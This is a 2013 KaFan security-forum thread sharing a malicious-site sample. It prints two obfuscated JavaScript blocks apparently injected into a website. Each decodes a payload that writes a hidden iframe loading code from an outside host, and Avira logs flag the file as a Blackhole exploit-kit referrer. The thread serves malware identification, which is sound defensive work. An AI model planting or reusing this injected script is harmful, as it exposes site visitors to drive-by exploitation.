收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://meubarradalagoa.com/ingles
返回列表 发新帖
查看: 1557|回复: 1
收起左侧

[已鉴定] http://meubarradalagoa.com/ingles

[复制链接]
fireold
发表于 2013-9-21 19:22:11 | 显示全部楼层 |阅读模式
  1. /*/6b1ee4*/

  3. e = eval;
  4. v = "0" + "x";
  5. a = 0;
  6. z = "y";
  7. try {
  8.     a *= 2
  9. } catch (q) {
  10.     a = 1
  11. }
  12. if (!a) {
  13.     try {
  14.         document["\x62od" + z]--
  15.     } catch (q) {
  16.         a2 = "_";
  17.         sa = 7;
  18.     }
  19.     z = "27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_6b_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_6b_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_6c_75_70_74_79_7c_6c_6d_35_7c_7a_36_6a_76_7c_75_7b_39_39_35_77_6f_77_2e_42_14_11_27_6b_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73_7c_7b_6c_2e_42_14_11_27_6b_35_7a_7b_80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42_14_11_27_6b_35_7a_7b_80_73_6c_35_6f_6c_70_6e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_6b_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e_38_77_7f_2e_42_14_11_27_6b_35_7a_7b_80_73_6c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_6b_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27_2e_38_77_7f_2e_42_14_11_14_11_27_70_6d_27_2f_28_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6b_2e_30_30_27_82_14_11_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_2e_43_6b_70_7d_27_70_6b_44_63_2e_6b_63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6b_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6b_30_42_14_11_27_84_14_11_84_14_11_6d_7c_75_6a_7b_70_76_75_27_5a_6c_7b_4a_76_76_72_70_6c_2f_6a_76_76_72_70_6c_55_68_74_6c_33_6a_76_76_72_70_6c_5d_68_73_7c_6c_33_75_4b_68_80_7a_33_77_68_7b_6f_30_27_82_14_11_27_7d_68_79_27_7b_76_6b_68_80_27_44_27_75_6c_7e_27_4b_68_7b_6c_2f_30_42_14_11_27_7d_68_79_27_6c_7f_77_70_79_6c_27_44_27_75_6c_7e_27_4b_68_7b_6c_2f_30_42_14_11_27_70_6d_27_2f_75_4b_68_80_7a_44_44_75_7c_73_73_27_83_83_27_75_4b_68_80_7a_44_44_37_30_27_75_4b_68_80_7a_44_38_42_14_11_27_6c_7f_77_70_79_6c_35_7a_6c_7b_5b_70_74_6c_2f_7b_76_6b_68_80_35_6e_6c_7b_5b_70_74_6c_2f_30_27_32_27_3a_3d_37_37_37_37_37_31_39_3b_31_75_4b_68_80_7a_30_42_14_11_27_6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_27_44_27_6a_76_76_72_70_6c_55_68_74_6c_32_29_44_29_32_6c_7a_6a_68_77_6c_2f_6a_76_76_72_70_6c_5d_68_73_7c_6c_30_14_11_27_32_27_29_42_6c_7f_77_70_79_6c_7a_44_29_27_32_27_6c_7f_77_70_79_6c_35_7b_76_4e_54_5b_5a_7b_79_70_75_6e_2f_30_27_32_27_2f_2f_77_68_7b_6f_30_27_46_27_29_42_27_77_68_7b_6f_44_29_27_32_27_77_68_7b_6f_27_41_27_29_29_30_42_14_11_84_14_11_6d_7c_75_6a_7b_70_76_75_27_4e_6c_7b_4a_76_76_72_70_6c_2f_27_75_68_74_6c_27_30_27_82_14_11_27_7d_68_79_27_7a_7b_68_79_7b_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_35_70_75_6b_6c_7f_56_6d_2f_27_75_68_74_6c_27_32_27_29_44_29_27_30_42_14_11_27_7d_68_79_27_73_6c_75_27_44_27_7a_7b_68_79_7b_27_32_27_75_68_74_6c_35_73_6c_75_6e_7b_6f_27_32_27_38_42_14_11_27_70_6d_27_2f_27_2f_27_28_7a_7b_68_79_7b_27_30_27_2d_2d_14_11_27_2f_27_75_68_74_6c_27_28_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_35_7a_7c_69_7a_7b_79_70_75_6e_2f_27_37_33_27_75_68_74_6c_35_73_6c_75_6e_7b_6f_27_30_27_30_27_30_14_11_27_82_14_11_27_79_6c_7b_7c_79_75_27_75_7c_73_73_42_14_11_27_84_14_11_27_70_6d_27_2f_27_7a_7b_68_79_7b_27_44_44_27_34_38_27_30_27_79_6c_7b_7c_79_75_27_75_7c_73_73_42_14_11_27_7d_68_79_27_6c_75_6b_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_35_70_75_6b_6c_7f_56_6d_2f_27_29_42_29_33_27_73_6c_75_27_30_42_14_11_27_70_6d_27_2f_27_6c_75_6b_27_44_44_27_34_38_27_30_27_6c_75_6b_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_35_73_6c_75_6e_7b_6f_42_14_11_27_79_6c_7b_7c_79_75_27_7c_75_6c_7a_6a_68_77_6c_2f_27_6b_76_6a_7c_74_6c_75_7b_35_6a_76_76_72_70_6c_35_7a_7c_69_7a_7b_79_70_75_6e_2f_27_73_6c_75_33_27_6c_75_6b_27_30_27_30_42_14_11_84_14_11_70_6d_27_2f_75_68_7d_70_6e_68_7b_76_79_35_6a_76_76_72_70_6c_4c_75_68_69_73_6c_6b_30_14_11_82_14_11_70_6d_2f_4e_6c_7b_4a_76_76_72_70_6c_2f_2e_7d_70_7a_70_7b_6c_6b_66_7c_78_2e_30_44_44_3c_3c_30_82_84_6c_73_7a_6c_82_5a_6c_7b_4a_76_76_72_70_6c_2f_2e_7d_70_7a_70_7b_6c_6b_66_7c_78_2e_33_27_2e_3c_3c_2e_33_27_2e_38_2e_33_27_2e_36_2e_30_42_14_11_14_11_81_81_81_6d_6d_6d_2f_30_42_14_11_84_14_11_84_14_11" ["split"](a2);
  20.     za = "";
  21.     for (i = 0; i < z.length; i++) {
  22.         za += String["fromCharCode"](e(v + (z[i])) - sa);
  23.     }
  24.     zaz = za;
  25.     e(zaz);
  26. } /*/ded509*/

  28. /*f82c4e*/
  29. ps = "split";
  30. asd = function() {
  31.     d.body--
  32. };
  33. a = ("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,172,151,173,166,155,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,172,151,173,166,155,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,151,146,66,62,145,160,164,154,145,62,173,151,167,170,155,162,152,163,166,161,145,170,155,157,62,147,154,63,164,154,164,63,73,172,70,132,130,152,112,162,62,164,154,164,53,77,21,16,44,172,151,173,166,155,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,172,151,173,166,155,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,172,151,173,166,155,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,172,151,173,166,155,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,172,151,173,166,155,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,172,151,173,166,155,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,172,151,173,166,155,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,172,151,173,166,155,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,172,151,173,166,155,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,172,151,173,166,155,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16" [ps](","));
  34. ss = String;
  35. d = document;
  36. for (i = 0; i < a.length; i += 1) {
  37.     a[i] = -(8 - 4) + parseInt(a[i], 8);
  38. }
  39. try {
  40.     asd()
  41. } catch (q) {
  42.     zz = 0;
  43. }
  44. try {
  45.     zz /= 2
  46. } catch (q) {
  47.     zz = 1;
  48. }
复制代码


Avira
2013/9/21 下午 07:18 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\activateActiveX[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.CL.142' [virus]
      已採取動作:
      檔案會移動至 '54482118.qua' 名稱底下的隔離區目錄。.

2013/9/21 下午 07:18 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        782
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/21 下午 07:17 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\activateActiveX[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CL.142 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/21 下午 07:17 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\activateActiveX[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CL.142 [virus]'
      執行的動作:拒絕存取

2013/9/21 下午 07:17 [Web Protection] 發現惡意程式碼
      從 URL "http://meubarradalagoa.com/activateActiveX.js" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CL.142' [virus]。
      已採取動作:已略過


av12.jpg



fs12.jpg
回复

举报

656635525
发表于 2013-9-21 20:35:33 | 显示全部楼层
2.jpg
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 10:46 , Processed in 0.125010 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表